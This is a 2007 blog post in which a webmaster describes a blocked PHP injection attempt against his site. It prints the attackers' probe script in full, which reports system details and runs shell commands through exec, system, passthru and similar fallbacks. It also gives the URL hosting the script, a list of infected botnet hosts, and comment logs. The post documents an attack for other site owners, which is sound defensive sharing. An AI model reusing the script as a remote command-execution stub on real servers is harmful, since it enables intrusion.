Sunday, October 28, 2007

Hackers Try Another Botnet Attack

Here we go again with the hackers making another run at one of my websites trying to inject PHP code into a site that doesn't even have PHP enabled which is amusing at best.

The script they were trying to inject was located here:

http://www.doncapone.com.br/.,/n?
Here's a copy of their PHP script for your viewing pleasure:
<?
$ker = @php_uname();
$osx = @PHP_OS;
echo "f7f32504cabcb48c21030c024c6e5c1a<br>"; // md5('xeQt');
echo "Uname:$ker<br>";
echo "SySOs:$osx<br>";
if ($osx == "WINNT") { $xeQt="ipconfig -a"; }
else { $xeQt="id"; }
$hitemup=ex($xeQt);
echo $hitemup;
function ex($cfe)
{
$res = '';
if (!empty($cfe))
{
if(function_exists('exec'))
{
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
?>
Here's a list of IP's with reverse DNS of the botnet involved with the attack so you can get an idea that any machine can be infected, it's pretty random:
121.119.172.33
newsclip.be

134.76.41.1
saturn.roentgen.physik.uni-goettingen.de.

195.14.56.16
netgenic.pac.ru.

195.205.77.30
bsd.page.pl.

195.77.190.208
www.medinalaboral.com.

198.189.237.157
garnet.csumb.edu.

200.89.153.204
gw0fibertel.tenroses.com.ar.

203.146.127.143
mail.wisetair.com.

203.146.129.149
not found: 3(NXDOMAIN)

203.81.43.130
130.128.43.81.203.in-addr.arpa.
mx1.mail.cliqo.com.

204.8.46.250
eaglemedia.com.

207.176.224.189
207-176-224-189.static-ip.ravand.ca.

207.44.178.47
mail.tmanshost.com.

208.101.13.198
server-center.net.

209.61.181.243
server4.sulek.net.

210.48.156.42
dns7.kutu.net.

211.62.35.151
not found: 3(NXDOMAIN)

212.110.119.85
www05.makolan.net.

212.174.113.76
mail.tros.gen.tr.

212.39.26.44
web22.hostdeck.com.

213.190.51.202
ns1.laisvas.lt.

213.218.141.11
caracas15.ecritel.net.

221.143.48.237
221-143-48-237.tongkni.co.kr.

222.231.2.50
b50.nskorea.com.

62.4.100.2
host.mantlik.cz.

64.91.251.107
nexus.sourcedns.com.

66.11.122.105
service66.11.122-105.serverprovider.com.

66.55.78.16
66-55-78-16.yourhostingprovider.net.

70.130.237.252
;; connection timed out; no servers could be reached

74.50.13.48
deneb.lunarpages.com.

81.173.242.33
gate.eyepower.de.

81.255.205.81
mail.chaffenay.com.

82.116.79.30
reseller.sircon.net.

82.195.230.142
gdp-lin-230-142.as16215.net.

82.67.222.122
bdy93-1-82-67-222-122.fbx.proxad.net.

85.13.194.179
cherryco.marketing-internet.com.

86.125.92.68
6-125-92-68.brasov.rdsnet.ro.

Pretty random list of sites infected with this botnet from locations throughout the world.

The bot blocker shut down all these attempts but I wonder what they'll try next time?

4 comments:

Jeremy said...

What did the script do?

What kind of site was it?

IncrediBILL said...

The site was hacked, they weren't involved.

The script is a type of shell script, the entry way into the server, it's a probe.

Ban Proxies said...

I ran this search else { $xeQt="id"; }.

I'm very curious what OS those hacked boxes are running.

Ban Proxies said...

Google Wireless Transcoder being used in a hacking attempt.


Log File
- Request contained a malicious JavaScript or SQL injection attack

Header
- GET /node/4124#comment-501 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Encoding: gzip Accept-Language: en-us Cookie: PHPSESSID=554c98325f86ae95927204be27b834bc; bb2_screener_=1195063773+72.14.193.1+86.106.50.55 Host: www.xxx.com Referer: http://www.xxx.com/node/4124 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3; IEMB3) X-Forwarded-For: 86.106.50.55 X-moz: prefetch


IP Whois = 72.14.193.1 - - [20/May/2007:12:38:06 +0200] "GET /images/cs.gif HTTP/1.1" 200 546 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Google Wireless Transcoder;)"

This is the hacker:
inetnum: 86.106.32.0 - 86.106.63.255
netname: SC-UPC-ROMANIA-SA
descr: SC UPC Romania SA
descr: str. Herastrau 17
descr: Bucuresti 1
country: ro
admin-c: AH1598-RIPE
tech-c: MA190-RIPE
status: ASSIGNED PA
remarks: Registered trough http://www.jump.ro/ip.html
mnt-by: RO-MNT
mnt-lower: RO-MNT
mnt-routes: ASTRALTELECOM-MNT
source: RIPE Filtered
person: Astral Telecom Hostmaster
address: Astral Telecom SA
address: ROMANIA
phone: 40 264 414688
fax-no: 40 264 414687
e-mail: hostmaster@astral.ro


I blocked 86.106.32.0/19 about 6 months ago and the garbage still got through.